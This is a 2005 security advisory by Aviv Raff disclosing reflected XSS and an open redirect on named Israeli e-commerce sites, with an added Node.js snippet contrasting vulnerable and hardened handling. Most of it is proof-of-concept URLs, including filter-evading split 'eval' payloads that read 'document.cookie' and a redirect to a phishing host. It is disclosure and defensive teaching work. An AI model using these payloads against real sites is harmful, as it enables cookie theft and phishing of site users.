Message-ID: <0IA200827N6MOD20@i_mtaout3.012.net.il>
From: avivra at 012.net.il (Aviv Raff)
Subject: Leading Israeli e-commerce sites XSS vulnerabilities advisory

Leading Israeli e-commerce sites XSS vulnerabilities advisory
URL: http://www.raffon.net/advisories/commxss.html
Date: January 10, 2005
Author: Aviv Raff
Introduction
Many leading Israeli e-commerce sites can be abused for phishing: they contain
pages that reflect attacker-supplied input into the HTML, allowing arbitrary
script to be injected and executed in the user's browser.
Technical Details
Many leading Israeli e-commerce sites generate dynamic HTML pages from
user-submitted data and from data obtained from other sources. Most of these
sites do not encode that data before writing it into the page, and are
therefore vulnerable to Cross-Site Scripting: a crafted link injects code that
executes arbitrary script in the context of the site, which can steal the
user's cookie or display a fake page (for example a login form) under the
site's own domain.
The P1000 web site has an open redirect: a query string parameter is used as a
redirect target without validation, so a link that appears to point at
p1000.co.il can send the user to any external page. This is easily exploited
by phishers.
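As an added example, not code from the advisory or from any of the sites named in it, the following Node.js snippet models both bug classes described above beside a hardened version of each: reflected XSS from unencoded request input written into a search page (text-node and attribute contexts, and why a keyword blacklist is only a partial fix against the split payloads used later in this advisory), and an open redirect through a query parameter. The function names and the SITE_ORIGIN value are assumptions for illustration.

```javascript
// Added example (not part of the advisory): a minimal model of the two bug
// classes reported above, each beside a hardened version. Function names
// and the SITE_ORIGIN value are assumptions for illustration.

// ---- 1. Reflected XSS: request input copied into HTML unencoded ----

// Vulnerable: the search term is interpolated raw into a text node and into a
// double-quoted attribute, so <script>alert(document.cookie)</script> becomes
// live markup and "><img src=x onload=...> breaks out of the attribute.
function renderSearchVulnerable(keyword) {
  return `<h1>Results for: ${keyword}</h1>\n` +
         `<input name="keyword" value="${keyword}">`;
}

// Hardened: encode the five characters that can change HTML structure before
// the value is written. One table covers both text nodes and double-quoted
// attribute values; this is output encoding, not input filtering.
function escapeHtml(s) {
  const table = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => table[c]);
}

function renderSearchSafe(keyword) {
  const k = escapeHtml(keyword);
  return `<h1>Results for: ${k}</h1>\n` +
         `<input name="keyword" value="${k}">`;
}

// A keyword blacklist is the kind of partial fix that stops <script> but not
// a split payload such as " onmouseover=eval("al"+"ert(document.cookie)") ".
function blacklistFilter(s) {
  return String(s).replace(/<script|alert\(/gi, "");
}

// ---- 2. Open redirect: a query parameter used as the redirect target ----

// Vulnerable: ?urladd=http://www.phisher.com sends the user wherever the
// link says, while the link they clicked carried the trusted site's hostname.
function redirectVulnerable(urladd) {
  return urladd;
}

// Hardened: parse the candidate against our own origin and accept only a path
// on that origin. Comparing the parsed origin (not a string prefix) also
// rejects the "//evil", "/\evil" and "javascript:" forms.
const SITE_ORIGIN = "https://shop.example"; // assumed origin for the example

function safeRedirect(urladd, fallback = "/") {
  if (typeof urladd !== "string" || urladd === "") return fallback;
  let target;
  try {
    target = new URL(urladd, SITE_ORIGIN);
  } catch (e) {
    return fallback;
  }
  if (target.origin !== SITE_ORIGIN) return fallback;
  // Re-emit only the path, query and fragment so the Location header never
  // carries a host the attacker chose.
  return target.pathname + target.search + target.hash;
}

// Usage: the advisory's simplest payload, rendered both ways.
const payload = "<script>alert(document.cookie)</script>";
console.log(renderSearchVulnerable(payload));
console.log(renderSearchSafe(payload));
console.log(redirectVulnerable("http://www.phisher.com")); // attacker's host
console.log(safeRedirect("http://www.phisher.com"));       // falls back to "/"
```

The encoding table is applied at output time, in the context the value is written into; the blacklist is included only to show why removing known keywords does not close the hole. The redirect check deliberately returns a relative path rather than the parsed absolute URL, so even a future parsing bug cannot put a foreign host into the Location header.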
Examples
NetAction:
http://www.netaction.co.il/search.php?qsn=<img%20src=Images/space.gif%20onload=alert(document.cookie)%20>
http://www.netaction.co.il/personal.php?formPersonalID="><img%20src=Images/space.gif%20onload=alert(document.cookie)%20>
http://www.netaction.co.il/contact.php?formFirstName="><img%20src=Images/space.gif%20onload=alert(document.cookie)%20>
P1000:
http://www.p1000.co.il/default.asp?urladd=http://www.phisher.com
Wallashops:
http://www.wallashops.co.il/shopmind_portal_heb/main.asp?name="><script>alert(document.cookie)</script>
http://www.wallashops.co.il/shopmind_portal_heb/main.asp?name="%20onmouseover=eval("al"%2B"ert(doc"%2B"ument.coo"%2B"kie)")%20"
Zap:
http://www.zap.co.il/gsearch.asp?keyword=<script>alert(document.cookie)</script>
GetIt:
http://www.getit.co.il/ie2/ProdList_Search.asp?sw1=<script>alert(document.cookie)</script>
Sakal Online:
http://www.sakal.co.il/jsp/pg/SearchResultNew.jsp?searchType=byName&keyWord=<script>alert(document.cookie)</script>
NfcShop:
http://shop.nfc.co.il/signin.asp?msg=<script>alert(document.cookie)</script>
Daka90:
http://daka90.ynet.co.il/Login/CdaPersonalAreaLogin/1,2141,,00.html?txtemail='><script>alert(document.cookie)</script>
Olsale:
http://www.olsale.co.il/olsale/Login.aspx?urlsource=><script>alert(document.cookie)</script>&type=1&rtype=1
Issta:
http://www.issta.co.il/heb/flight_details.asp?product_id=2092&source_id=6&price_id=3944&from_date='><script>alert(document.cookie)</script>10/04/2004&to_date=31/12/2004&s=hp&file_name=main\regularflightBottom1.xml
http://www.issta.co.il/heb/flight_details.asp?product_id=2092&source_id=6&price_id=3944&from_date='%20onmouseover=alert(document.cookie)%20x='10/04/2004&to_date=31/12/2004&s=hp&file_name=main\regularflightBottom1.xml
Parsi:
http://www.parsi.co.il/SignIn.asp?referrer="><script>alert(document.cookie)</script>
http://www.parsi.co.il/SignIn.asp?referrer="><img%20src=/new_images/cat_p_dot.jpg%20onload=eval("alert(doc"%2B"ume"%2B"nt."%2B"co"%2B"okie)",10)%20>
Arkia:
http://www.arkia.co.il/click/cl_4005.main?p_domestic_yn="><iframe%20src="http://www.arkia.co.il/"%20onload="if%20(document.cookie!='')alert(document.cookie)"></iframe>
Printmall:
https://www.printmall.co.il/Artists/Join.asp?Artsts_FName="><script>alert(document.cookie)</script>
One (this is actually a leading sports website, but it has a paid premium
section and also contains links to other e-commerce sites):
http://www.one.co.il/one/search.asp?data=<script>alert(document.cookie)</script>
http://www.one.co.il/search/MoreArticals.asp?data=<script>alert(document.cookie)</script>
Solutions
All of the sites were contacted via email or a suggestion form on 27/12/2004.
Netaction, P1000, GetIt, Daka90, Arkia and Printmall have already fixed the
vulnerabilities.
Wallashops, Issta and Parsi are partly fixed.
The other sites are still vulnerable: be careful when following a link to
those sites, and do not enter confidential information on a page reached
through a link you do not trust.
Disclaimer: The information in this advisory and any of its demonstrations
is provided "as is" without warranty of any kind.
-- Copyright (C) 2004-2005 Aviv Raff. --